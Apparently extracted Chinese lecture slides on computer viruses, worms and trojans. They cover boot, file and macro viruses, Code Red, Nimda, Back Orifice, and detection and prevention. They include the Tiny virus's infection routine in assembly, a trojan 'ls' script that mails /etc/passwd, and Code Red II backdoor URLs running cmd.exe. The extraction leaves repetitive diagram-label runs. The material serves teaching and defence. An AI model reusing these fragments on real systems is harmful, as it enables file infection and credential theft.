計(jì)算機(jī)病毒蠕蟲和特洛伊木馬介紹

1、計(jì)算機(jī)病毒、蠕蟲和特洛伊木馬提綱計(jì)算機(jī)病毒網(wǎng)絡(luò)蠕蟲1. 特洛伊木馬計(jì)算機(jī)病毒 病毒結(jié)構(gòu)模型 病毒的分類 引導(dǎo)型病毒 文件型病毒 宏病毒 病毒舉例 病毒防范計(jì)算機(jī)病毒的結(jié)構(gòu)傳染條件判斷傳染代碼表現(xiàn)及破壞條件判斷破壞代碼傳染模塊表現(xiàn)模塊計(jì)算機(jī)病毒的分類 按攻擊平臺分類：DOS,Win32，MAC，Unix 按危害分類：良性、惡性 按代碼形式：源碼、中間代碼、目標(biāo)碼 按宿主分類： 引導(dǎo)型 主引導(dǎo)區(qū) 操作系統(tǒng)引導(dǎo)區(qū) 文件型 操作系統(tǒng) 應(yīng)用程序 宏病毒引導(dǎo)型病毒引導(dǎo)記錄 主引導(dǎo)記錄（MBR）55AA主引導(dǎo)程序(446字節(jié))分區(qū)1(16 字節(jié))主分區(qū)表(64字節(jié)）分區(qū)2(16 字節(jié))分區(qū)3(16 字節(jié))分

2、區(qū)4(16 字節(jié))結(jié)束標(biāo)記（2字節(jié)）引導(dǎo)代碼及出錯信息A引導(dǎo)型病毒系統(tǒng)引導(dǎo)過程Power OnCPU & ROM BIOS InitializesPOST TestsLook for boot deviceMBR bootPartition Table LoadDOS Boot Sector RunsLoads IO.SYSMSDOS.SYSDOS Loaded引導(dǎo)型病毒感染與執(zhí)行過程系統(tǒng)引導(dǎo)區(qū)引導(dǎo)正常執(zhí)行病毒病毒執(zhí)行病毒駐留帶毒執(zhí)行。病毒引導(dǎo)系統(tǒng)病毒體。病毒的激活過程空閑區(qū)。內(nèi)存空間int8int21int2Fint4A時(shí)鐘中斷處理DOS中斷處理外設(shè)處理中斷實(shí)時(shí)時(shí)種警報(bào)中斷空閑區(qū)帶病

3、毒程序空閑區(qū)空閑區(qū)正常程序病 毒8int8空閑區(qū)正常程序正常程序。正常程序正常程序正常程序int8是26日？ 是,破壞！int8舉例小球病毒（Bouncing Ball) 在磁盤上的存儲位置文件分配表病毒的第二部分000號扇區(qū)001號扇區(qū)第一個(gè)空簇FF7正常的引導(dǎo)扇區(qū)正常的引導(dǎo)扇區(qū)病毒的第一部分感染后的系統(tǒng)啟動過程啟動將病毒程序的第一部分送入內(nèi)存高端將第二部分裝入內(nèi)存，與第一部分拼接在一起讀入真正的Boot 區(qū)代碼，送到0000:TC00處修改INT 13 中斷向量，指向病毒轉(zhuǎn)移

4、到 0000:TC00處，開始真正的系統(tǒng)引導(dǎo)觸發(fā)條件修改后的INT 13進(jìn)入INT 13中斷是否為讀盤？執(zhí)行正常的INT 13程序執(zhí)行正常的INT 13程序N所讀盤是否是自身？Y修改INT8 開始發(fā)作Y是否整點(diǎn)或半點(diǎn)Y執(zhí)行正常的INT 13程序Y是否帶病毒？N調(diào)用傳染過程感染磁盤N不發(fā)作執(zhí)行正常的INT 13程序N病毒檢測原理 特征匹配 例如，在香港病毒:1F 58 EA 1A AF 00 F0 9C: POP AXJMP F000 AF1APUSHF 行為監(jiān)控 對中斷向量表的修改 對引導(dǎo)記錄的修改 對.exe, .com文件的寫操作 駐留內(nèi)存 軟件模擬防范與檢測 數(shù)據(jù)備份 不要用移動介質(zhì)啟動

5、（設(shè)置CMOS選項(xiàng)） 設(shè)置CMOS的引導(dǎo)記錄保護(hù)選項(xiàng) 安裝補(bǔ)丁，并及時(shí)更新 安裝防病毒軟件，及時(shí)更新病毒定義碼 限制文件共享 不輕易打開電子郵件的附件 沒有病毒處理前不要使用其他移動介質(zhì) 不要運(yùn)行不可信的程序 移動介質(zhì)寫保護(hù)文件型病毒文件結(jié)構(gòu) .COM文件.EXE 文件PSP Header (256 bytes)Code, Data, StackSegment(s)(64K Bytes)代碼、數(shù)據(jù)、堆棧在通一段中在內(nèi)存中的.COM是磁盤文件的鏡像 PSP Header (512 bytes)Code Segment(s)(64K )Data Segment(s)(64K )Stack Segm

6、ent(s)(64K )其他可執(zhí)行的文件類型 .BAT .PIF .SYS .DRV .OVR .OVL .DLL .VxD正常正常程序程序正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序

7、頭正常正常程序程序程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序病毒程序程序頭病毒程序病毒程序程序頭病毒程序病毒程序程序頭病毒程序病毒程序程序頭病毒程序病毒程序程序頭病毒程序病毒程序病毒程序病毒程序病毒程序病毒程序病毒程序病毒程序正常正常程序程序程序頭程序頭文件型病毒感染機(jī)理文件型病毒舉例 最簡單的病毒Tiny-32(32 bytes) 尋找

8、宿主文件 打開文件 把自己寫入文件 關(guān)閉文件MOV AH, 4E ;setup to find a fileINT 21;find the host fileMOV AX, 3D02;setup to open the host fileINT 21;open host fileMOV AH, 40;setup to write file to diskINT 21;write to fileDB *.COM;what files to look for宏病毒（Macro Virus） 歷史： 1980年，Dr. Fredrick Cohen and Ralf Burger 論文 1994年，

9、Microsoft Word 第一例宏病毒 Word, Excel, Access, PowerPoint, Project, Lotus AmiPro, Visio, Lotus 1-2-3, AutoCAD, Corel Draw. 使用數(shù)據(jù)文件進(jìn)行傳播，使得反病毒軟件不再只關(guān)注可執(zhí)行文件和引導(dǎo)區(qū) DOE ViRT 統(tǒng)計(jì)，85%的病毒感染歸因于宏病毒 易于編寫，只需要一兩天的時(shí)間，1015行代碼 大量的用戶：90 Million MS Office Users 人們通常不交換程序，而交換數(shù)據(jù)宏病毒工作機(jī)理有毒文件.docNormal.dot激活autoopen宏寫入無毒文件.docNorm

10、al.dot激活病毒注意事項(xiàng) Macro 可以存在模板里，也可以存在文檔里 RTF文件也可以包含宏病毒 通過IE 瀏覽器可以直接打開，而不提示下載提綱計(jì)算機(jī)病毒網(wǎng)絡(luò)蠕蟲1. 特洛伊木馬蠕蟲（Worm） 一個(gè)獨(dú)立的計(jì)算機(jī)程序，不需要宿主 自我復(fù)制，自主傳播（Mobile） 占用系統(tǒng)或網(wǎng)絡(luò)資源、破壞其他程序 不偽裝成其他程序，靠自主傳播 利用系統(tǒng)漏洞； 利用電子郵件（無需用戶參與）莫里斯蠕蟲事件 發(fā)生于1988年，當(dāng)時(shí)導(dǎo)致大約6000臺機(jī)器癱瘓 主要的攻擊方法 Rsh，rexec：用戶的缺省認(rèn)證 Sendmail 的debug模式 Fingerd的緩沖區(qū)溢出 口令猜測CR I 主要影響Window

11、s NT系統(tǒng)和Windows 2000主要影響國外網(wǎng)絡(luò)據(jù)CERT統(tǒng)計(jì)，至8月初已經(jīng)感染超過25萬臺 主要行為利用IIS 的Index服務(wù)的緩沖區(qū)溢出缺陷進(jìn)入系統(tǒng)檢查c:notworm文件是否存在以判斷是否感染中 文 保 護(hù) （ 是 中 文windows就不修改主頁）攻擊白宮！CR II Inspired by RC I 影響波及全球 國內(nèi)影響尤其廣泛 主要行為 所利用缺陷相同 只感染windows2000系統(tǒng)，由于一些參數(shù)的問題，只會導(dǎo)致NT死機(jī) 休眠與掃描：中文windows，600個(gè)線程N(yùn)imda 簡介 影響系統(tǒng)：MS win9x, wind2k, win XP 傳播途徑： Email、文

12、件共享、頁面瀏覽、MS IIS目錄遍歷、Code Red 后門 影響 群發(fā)電子郵件，付病毒 掃描共享文件夾， 掃描有漏洞的IIS, 掃描有Code Red后門的IIS Server紅色代碼病毒 紅色代碼病毒是一種結(jié)合了病毒、木馬、DDOS機(jī)制的蠕蟲。 2001年7月中旬，在美國等地大規(guī)模蔓延。 2001年8月初，出現(xiàn)變種coderedII，針對中文版windows系統(tǒng)，國內(nèi)大規(guī)模蔓延。 通過80端口傳播。 只存在與網(wǎng)絡(luò)服務(wù)器的內(nèi)存，不通過文件載體。 利用IIS緩沖區(qū)溢出漏洞（2001年6月18日發(fā)布）CodeRed I在侵入一臺服務(wù)器后，其運(yùn)行步驟是：設(shè)置運(yùn)行環(huán)境，修改堆棧指針，設(shè)置堆棧大小為

13、218h字節(jié)。接著使用RVA（相對虛擬地址）查找GetProcAddress的函數(shù)地址，然后就獲得其他socket、connect、send、recv、closesocket等函數(shù)地址；如果C:notworm在，不再進(jìn)一步傳染；傳染其他主機(jī)。創(chuàng)造100個(gè)線程，其中99個(gè)用戶感染其他WEB服務(wù)器，被攻擊IP通過一個(gè)算法計(jì)算得出；篡改主頁，如果系統(tǒng)默認(rèn)語言為“美國英語”，第100個(gè)進(jìn)程就將這臺服務(wù)的主頁改成“Welcome to http:/ !, Hacked By Chinese!”，并持續(xù)10個(gè)小時(shí)。（這個(gè)修改直接在內(nèi)存中修改，而不是修改*.htm文件）；1.如果時(shí)間在20：00UTC和23

14、：59UTC之間，將反復(fù)和白宮主頁建立連接，并發(fā)送98k字節(jié)數(shù)據(jù)，形成DDOS攻擊。CodeRed II增加了特洛依木馬的功能，并針對中國網(wǎng)站做了改進(jìn)計(jì)算IP的方法進(jìn)行了修改，使病毒傳染的更快；檢查是否存在CodeRedII原子，若存在則進(jìn)入睡眠狀態(tài)防止反復(fù)感染，若不存在則創(chuàng)建CodeRedII原子；創(chuàng)建300個(gè)線程進(jìn)行傳染，若系統(tǒng)默認(rèn)語言為簡體中文或繁體中文，則創(chuàng)建600個(gè)線程；檢查時(shí)間。病毒作者的意圖是傳播過程在2001年10月1日完成，之后，蠕蟲會爆發(fā)而使系統(tǒng)不斷重新啟動。在系統(tǒng)中安裝一個(gè)特洛依木馬：拷貝系統(tǒng)目錄cmd.exe到IIS的腳本執(zhí)行目錄下，改名為root.exe；將病毒體內(nèi)的

15、木馬解壓縮寫到C盤和D盤的explorer.exe1.木馬每次系統(tǒng)和啟動都會運(yùn)行，禁止系統(tǒng)的文件保護(hù)功能，并將C盤和D盤通過web服務(wù)器共享CodeRed II 攻擊形式http:/x.x.x.x/c/inetpub/scripts/root.exe?/c+dirhttp:/x.x.x.x/c/winnt/system32/cmd.exe?/c+dir 其中x.x.x.x是被攻擊的IP地址，dir可以是任意命令，比如刪除系統(tǒng)中的文件，向外發(fā)送機(jī)密數(shù)據(jù)等，這個(gè)后門后來也成為了nimda病毒的一個(gè)傳播模式。 下面是cert/cc上提供的被攻擊服務(wù)器日志(CA-2001-11) 2001-05-06

16、 12:20:19 0 - 0 80 GET /scripts/././winnt/system32/cmd.exe /c+dir 200 2001-05-06 12:20:19 0 - 0 80 GET /scripts/././winnt/system32/cmd.exe /c+dir+. 200 紅色代碼病毒的檢測和防范 針對安裝IIS的windows系統(tǒng)； 是否出現(xiàn)負(fù)載顯著增加（CPU/網(wǎng)絡(luò)）的現(xiàn)象； 用netstat an檢查是否有許多對外的80端口連接 在web日志中檢查是否有/default.ida?

17、xxx.%u0078%u0000 u00=a HTTP/1.0這樣的攻擊記錄； 查找系統(tǒng)中是否存在文件c:explorer.exe或d:explorer.exe以及root.exe； 檢查注冊表文件中是否增加了C和D虛擬目錄，以及文件保護(hù)功能是否被禁止。 在任務(wù)管理器中檢查是否存在兩個(gè)explorer.exe進(jìn)程。提綱計(jì)算機(jī)病毒網(wǎng)絡(luò)蠕蟲1. 特洛伊木馬特洛伊木馬 名字來源：古希臘故事 通過偽裝成其他程序、有意隱藏自己惡意行為的程序，通常留下一個(gè)遠(yuǎn)程控制的后門 沒有自我復(fù)制的功能 非自主傳播 用戶主動發(fā)送給其他人 放到網(wǎng)站上由用戶下載最簡單的木馬舉例ls#!/bin/sh/bin/mail /e

18、tc/passwdlsPATH=./ :/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin特洛依木馬舉例 Back Orifice Cult of the Dead Cow在1998年8月發(fā)布, 公開源碼軟件，遵守GPL，是功能強(qiáng)大的遠(yuǎn)程控制器木馬。 boserver.exe、boconfig.exe、bogui.exe 在BO服務(wù)器上啟動、停止基于文本的應(yīng)用程序 目錄和文件操作。包括創(chuàng)建、刪除、查看目錄、查找、解壓、壓縮。 共享。創(chuàng)建共享資源 HTTP服務(wù)。啟動或停止HTTP服務(wù)。 擊鍵記錄。將BO服務(wù)器上用戶的擊鍵記錄在一個(gè)文本文件中，同

19、時(shí)記錄執(zhí)行輸入的窗口名。（可以獲得用戶口令）特洛依木馬 視頻輸入、播放。捕捉服務(wù)器屏幕到一個(gè)位圖文件中。 網(wǎng)絡(luò)連接。列出和斷開BO服務(wù)器上接入和接出的連接，可以發(fā)起新連接。 查看信息。查看所有網(wǎng)絡(luò)端口、域名、服務(wù)器和可見的共享“出口”。返回系統(tǒng)信息，包括機(jī)器名、當(dāng)前用戶、CPU類型、內(nèi)存容量及可用內(nèi)存、Windows版本、驅(qū)動器類型、硬盤容量及使用空間。 端口重定向。 注冊表 鎖住或重啟計(jì)算機(jī)。 傳輸文件特洛依木馬 使用netstat a 檢查是否還有未知端口監(jiān)聽(默認(rèn)31337) 檢測和刪除 注冊表HLMsoftwaremicrosoftwindowscurrentVersionrunservices鍵值，是否有“Name Data.exe”，若有則刪除 C:windowssystem目錄：刪除“ .exe”文件和windll.dll文件特洛依木馬 其他木馬 國外subsever、dagge